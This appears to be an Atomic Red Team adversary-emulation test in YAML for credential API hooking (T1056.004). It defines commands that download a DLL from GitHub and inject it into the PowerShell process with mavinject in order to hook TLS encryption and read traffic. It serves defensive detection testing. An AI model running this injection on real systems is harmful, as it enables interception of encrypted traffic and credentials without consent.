Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
34 lines
1.3 KiB
YAML
34 lines
1.3 KiB
YAML
attack_technique: T1056.004
|
|
display_name: 'Input Capture: Credential API Hooking'
|
|
atomic_tests:
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
|
|
description: |
|
|
Hooks functions in PowerShell to read TLS Communications
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
file_name:
|
|
description: Dll To Inject
|
|
type: path
|
|
default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
|
|
server_name:
|
|
description: TLS Server To Test Get Request
|
|
type: url
|
|
default: https://www.example.com
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
T1056.004x64.dll must exist on disk at specified location (#{file_name})
|
|
prereq_command: |
|
|
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing
|
|
executor:
|
|
command: |
|
|
mavinject $pid /INJECTRUNNING "#{file_name}"
|
|
Invoke-WebRequest #{server_name} -UseBasicParsing
|
|
name: powershell
|
|
elevation_required: true
|